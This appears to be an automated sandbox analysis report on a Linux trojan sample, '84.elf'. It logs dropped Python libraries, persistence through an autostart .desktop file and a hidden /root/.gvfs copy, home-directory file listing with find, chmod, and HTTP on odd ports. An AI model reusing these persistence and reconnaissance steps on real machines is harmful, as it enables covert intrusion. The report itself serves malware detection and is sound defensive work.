Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: _rl_match_hidden_files
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_completion_word_break_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_directory_completion_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_directory_rewrite_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_event_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_execute_next
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_filename_rewrite_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_filename_stat_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_input_available_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_pre_input_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_signal_event_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_startup_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_username_completion_function
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: tilde_expansion_failure_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: tilde_expansion_preexpansion_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: username_completion_function
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_password
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_username
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_username_callback
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_get_default_passwd_cb
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_get_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_get_srp_username
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_set_default_passwd_cb
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_set_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_srp_server_param_with_username
Source: readline.so.16.dr	ELF static info symbol of dropped file: PyOS_InputHook
Source: readline.so.16.dr	ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: readline.so.16.dr	ELF static info symbol of dropped file: rl_pre_input_hook
Source: readline.so.16.dr	ELF static info symbol of dropped file: rl_startup_hook

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal92.troj.evad.linELF@0/39@0/0

Persistence and Installation Behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/84.elf (PID: 6257)

File: /proc/6257/mounts

Jump to behavior

Sample tries to persist itself using .desktop files

Source: /tmp/84.elf (PID: 6257)

File: /root/.config/autostart/gvfs.desktop

Jump to behavior

Writes ELF files to hidden directories

Source: /tmp/84.elf (PID: 6257)

File written to hidden directory: /root/.gvfs/84.elf

Jump to dropped file

Creates hidden files and/or directories

Source: /tmp/84.elf (PID: 6257)	Directory: /root/.gvfs	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.cache	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.ssh	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.config	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.local	Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/84.elf (PID: 6260)	Shell command executed: sh -c "uname -p 2> /dev/null"	Jump to behavior
Source: /tmp/84.elf (PID: 6384)	Shell command executed: sh -c "cd; find . -type f > /tmp/list.txt"	Jump to behavior
Source: /tmp/84.elf (PID: 6389)	Shell command executed: sh -c "chmod +x /root/.gvfs/84.elf"	Jump to behavior

Executes the "chmod" command used to modify permissions

Source: /bin/sh (PID: 6390)

Chmod executable: /usr/bin/chmod -> chmod +x /root/.gvfs/84.elf

Jump to behavior

Executes the "rm" command used to delete files or directories

Source: /usr/bin/dash (PID: 6228)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dyRqBbtRkK /tmp/tmp.wSbLfeKNbu /tmp/tmp.up7UPCnJlz			Jump to behavior
Source: /usr/bin/dash (PID: 6229)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dyRqBbtRkK /tmp/tmp.wSbLfeKNbu /tmp/tmp.up7UPCnJlz			Jump to behavior

Sample tries to set the executable flag

Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_cffi_backend.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_cn.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_hk.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_iso2022.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_jp.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_kr.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_tw.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_ctypes.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_hashlib.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_json.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_multibytecodec.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_ssl.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/bz2.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._constant_time.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._openssl.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libbz2.so.1.0 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libcrypto.so.1.1 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libexpat.so.1 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libffi.so.6 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libpython2.7.so.1.0 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libreadline.so.7 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libssl.so.1.1 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libtinfo.so.5 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libz.so.1 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/pyexpat.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/readline.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/resource.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/termios.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/certifi/cacert.pem (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/certifi/old_root.pem (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/certifi/weak.pem (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/PKG-INFO (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/dependency_links.txt (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/not-zip-safe (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/requires.txt (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/top_level.txt (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6390)	File: /root/.gvfs/84.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Writes ELF files to disk

Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_cffi_backend.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_cn.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_hk.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_iso2022.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_jp.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_kr.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_tw.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_ctypes.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_hashlib.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_json.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_multibytecodec.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_ssl.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/bz2.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._constant_time.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._openssl.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libbz2.so.1.0	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libcrypto.so.1.1	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libexpat.so.1	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libffi.so.6	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libpython2.7.so.1.0	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libreadline.so.7	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libssl.so.1.1	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libtinfo.so.5	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libz.so.1	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/pyexpat.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/readline.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/resource.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/termios.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6257)	File written: /root/.gvfs/84.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 60486 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60486
Source: unknown	Network traffic detected: HTTP traffic on port 60488 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60488
Source: unknown	Network traffic detected: HTTP traffic on port 60490 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60490
Source: unknown	Network traffic detected: HTTP traffic on port 60492 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60492
Source: unknown	Network traffic detected: HTTP traffic on port 60494 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60494
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60496
Source: unknown	Network traffic detected: HTTP traffic on port 60498 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60498
Source: unknown	Network traffic detected: HTTP traffic on port 60500 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60500
Source: unknown	Network traffic detected: HTTP traffic on port 60502 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60502
Source: unknown	Network traffic detected: HTTP traffic on port 60504 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60504
Source: unknown	Network traffic detected: HTTP traffic on port 60506 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60506
Source: unknown	Network traffic detected: HTTP traffic on port 60508 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60508
Source: unknown	Network traffic detected: HTTP traffic on port 60510 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60510
Source: unknown	Network traffic detected: HTTP traffic on port 60512 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60512
Source: unknown	Network traffic detected: HTTP traffic on port 60514 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60514
Source: unknown	Network traffic detected: HTTP traffic on port 60516 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60516
Source: unknown	Network traffic detected: HTTP traffic on port 60518 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60518
Source: unknown	Network traffic detected: HTTP traffic on port 60520 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60520
Source: unknown	Network traffic detected: HTTP traffic on port 60522 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60522
Source: unknown	Network traffic detected: HTTP traffic on port 60524 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60524
Source: unknown	Network traffic detected: HTTP traffic on port 60526 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60526
Source: unknown	Network traffic detected: HTTP traffic on port 60528 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60528
Source: unknown	Network traffic detected: HTTP traffic on port 60530 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60530
Source: unknown	Network traffic detected: HTTP traffic on port 60532 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60532
Source: unknown	Network traffic detected: HTTP traffic on port 60534 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60534

ELF contains segments with high entropy indicating compressed/encrypted content

Source: _codecs_cn.so.16.dr

Dropped file: segment LOAD with 7.4298 entropy (max. 8.0)

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/84.elf (PID: 6257)	Queries kernel information via 'uname':	Jump to behavior
Source: /sbin/ldconfig.real (PID: 6259)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 6261)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Queries kernel information via 'uname':	Jump to behavior

Source: cacert.pem.16.dr

Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd

Executes the "uname" command used to read OS and architecture name

Source: /bin/sh (PID: 6261)

Uname executable: /usr/bin/uname -> uname -p

Jump to behavior

ID:	1522470
Product:	CloudBasic
Start time:	07:37:24
Start date:	30.09.2024
Sample:	84.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	51ac5f4bcffd208899ebe778c1725579
SHA1:	807c42578f63b569f37a95dc29267ef6c4ec9eea
SHA256:	684d950494951cda868a6d1d83e2ab8baedb7b4f2e8b079ab94771fb4fabd09a
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 49.77%

Linux Analysis Report
84.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Screenshots

Network Map

Contacted Public IPs

Contacted URLs

Linux Analysis Report 84.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Screenshots

Network Map

Contacted Public IPs

Contacted URLs

Linux Analysis Report
84.elf